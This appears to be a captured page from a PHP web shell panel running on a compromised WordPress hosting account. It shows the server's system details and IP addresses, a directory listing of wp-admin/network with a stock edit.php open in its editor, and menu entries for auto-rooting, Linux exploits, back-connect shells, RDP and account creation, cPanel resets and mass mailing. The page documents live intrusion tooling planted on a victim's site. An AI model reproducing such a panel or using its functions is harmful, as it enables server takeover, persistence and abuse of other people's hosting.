Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.116.23.158
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
upwellness.store /
wp-admin /
network /
[ HOME SHELL ]
Name
Size
Permission
Action
about.php
245
B
-rw-r--r--
admin.php
1
KB
-rw-r--r--
contribute.php
255
B
-rw-r--r--
credits.php
249
B
-rw-r--r--
edit.php
908
B
-rw-r--r--
freedoms.php
251
B
-rw-r--r--
index.php
2.84
KB
-rw-r--r--
menu.php
4.63
KB
-rw-r--r--
plugin-editor.php
266
B
-rw-r--r--
plugin-install.php
377
B
-rw-r--r--
plugins.php
249
B
-rw-r--r--
privacy.php
249
B
-rw-r--r--
profile.php
254
B
-rw-r--r--
settings.php
21.46
KB
-rw-r--r--
setup.php
247
B
-rw-r--r--
site-info.php
7.59
KB
-rw-r--r--
site-new.php
9.35
KB
-rw-r--r--
site-settings.php
5.49
KB
-rw-r--r--
site-themes.php
6.71
KB
-rw-r--r--
site-users.php
10.82
KB
-rw-r--r--
sites.php
13.26
KB
-rw-r--r--
theme-editor.php
264
B
-rw-r--r--
theme-insobsl.php
338
B
-rw-r--r--
theme-install.php
374
B
-rw-r--r--
themes.php
15.62
KB
-rw-r--r--
update-core.php
253
B
-rw-r--r--
update.php
450
B
-rw-r--r--
upgrade.php
4.85
KB
-rw-r--r--
user-edit.php
253
B
-rw-r--r--
user-new.php
5.12
KB
-rw-r--r--
users.php
9.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit.php
<?php /** * Action handler for Multisite administration panels. * * @package WordPress * @subpackage Multisite * @since 3.0.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; $action = ( isset( $_GET['action'] ) ) ? $_GET['action'] : ''; if ( empty( $action ) ) { wp_redirect( network_admin_url() ); exit; } /** * Fires just before the action handler in several Network Admin screens. * * This hook fires on multiple screens in the Multisite Network Admin, * including Users, Network Settings, and Site Settings. * * @since 3.0.0 */ do_action( 'wpmuadminedit' ); /** * Fires the requested handler action. * * The dynamic portion of the hook name, `$action`, refers to the name * of the requested action derived from the `GET` request. * * @since 3.1.0 */ do_action( "network_admin_edit_{$action}" ); wp_redirect( network_admin_url() ); exit;
Close